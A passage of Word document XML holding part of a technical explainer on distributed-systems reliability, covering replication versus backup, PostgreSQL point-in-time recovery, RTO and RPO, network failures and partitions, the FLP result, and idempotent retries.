      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why replication is NOT a backup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF7DEA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Replication propagates mistakes. If a developer drops a table, the DROP replicates to all replicas instantly. All copies are destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E6622" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Replication protects against hardware failure, NOT against logical errors (bugs, human mistakes, malicious actions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620DE05" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup provides temporal redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the ability to go back in time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F26473" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How point-in-time recovery works (PostgreSQL example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F044235" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Base backup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Periodic full snapshot of the database (e.g., weekly). A consistent copy at a specific moment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CA819" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continuous WAL archiving:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every WAL segment is copied to durable storage (S3) as it's written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30798D71" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233F108" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Restore the most recent base backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB29699" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Replay WAL segments from that backup's point forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27484B7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Stop at a specific timestamp: "recover to 2026-05-28 14:30:00" — just before the accidental DELETE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84E76F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Backup reliability concerns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF4BD0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Untested backups are not backups.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A backup that can't be restored is worthless. Regular restore drills are essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC5722" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup corruption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If the backup medium degrades, the backup itself may be unreadable. Store backups on multiple media, verify with checksums.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A794C2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retention policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> How far back can you recover? 1 day? 30 days? Depends on how quickly you detect logical errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5202B569" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO (Recovery Time Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> How long does restoration take? Restoring 10TB from S3 takes hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF65C4E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPO (Recovery Point Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> How much data can you afford to lose? If WAL is archived every 5 minutes, RPO = 5 minutes (you lose the last 5 minutes of writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223FEA0A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="5AEF0A6C">
          <v:rect id="_x0000_i2934" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="090242F9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Network Reliability — The Unreliable Fabric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D00CEB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Why Networks Are Fundamentally Unreliable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C71A1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Networks can exhibit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F01AA9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet loss:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Congestion, buffer overflow, hardware failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B91D1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet duplication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Retransmissions at lower layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56099E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet reordering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Different packets take different paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BBD4A1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet corruption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Bit flips during transit (CRC catches most but not all).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD9035A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partitions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Complete communication breakdown between groups of nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59624585" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency variation (jitter):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A packet takes 1ms one moment, 500ms the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11F781" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asymmetric failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A can reach B, but B cannot reach A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50D0D4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP provides reliability over unreliable networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D681B00" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sequence numbers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Detect reordering and loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE09B81" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acknowledgments:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Confirm delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA68CD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retransmissions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Resend lost packets (with exponential backoff).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36533825" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checksums:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Detect corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319DBBB5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Flow control:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Prevent receiver overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B36E78C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>But TCP doesn't solve everything:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545DA2B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>It guarantees delivery to the kernel buffer. NOT to the application (process could crash before reading the buffer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273799C0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>It cannot distinguish between "remote node crashed" and "network is slow." A timeout fires in both cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1223BC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>It adds latency for reliability (retransmissions take time — head-of-line blocking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F193A1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Network Partitions — The Most Challenging Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB94108" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What a partition is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D00BCEE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A network failure that splits nodes into groups that cannot communicate with each other. Each group may operate normally internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405CB4F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why partitions are insidious:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96BAD9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Both sides continue operating, potentially making conflicting decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148AF83E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Neither side can definitively know if the other side is down or if the network is partitioned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32621B18" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A node receiving no response cannot distinguish:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B646E0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Remote node crashed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9F371" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Network is partitioned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CF776" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Remote node is merely slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE59A9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The response was lost on the return path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C28289" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The impossibility result (FLP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1688F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>In an asynchronous system (no timing guarantees), it's impossible to distinguish a crashed node from a slow one. This means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790C18C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>You can never be 100% certain a node has failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475DE7A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Any failure detector has either false positives (declares alive nodes dead) or false negatives (fails to detect dead nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D0307" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Consensus protocols must make tradeoffs (timeouts that may be wrong).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA0C11" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Handling Partial Failures — The Fundamental Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DD101" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In a single computer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Either it works or it doesn't. Failure is total and detectable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7CB43" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In a distributed system:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Some components work while others don't. You get partial, ambiguous failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D9026" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>You sent a request to write data. You got a timeout. Did the write happen or not?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CFD9BC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If you retry: might create a duplicate (write happened but acknowledgment was lost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E0CDE8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If you don't retry: might lose the write (it never reached the server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48463F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution — Idempotency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBE096" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Make operations safe to retry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA3C484" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Assign a unique request ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B6D69D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Server checks: "Have I already processed request #abc-123?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E543D00" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If yes: return the cached result (don't re-execute).</w:t>
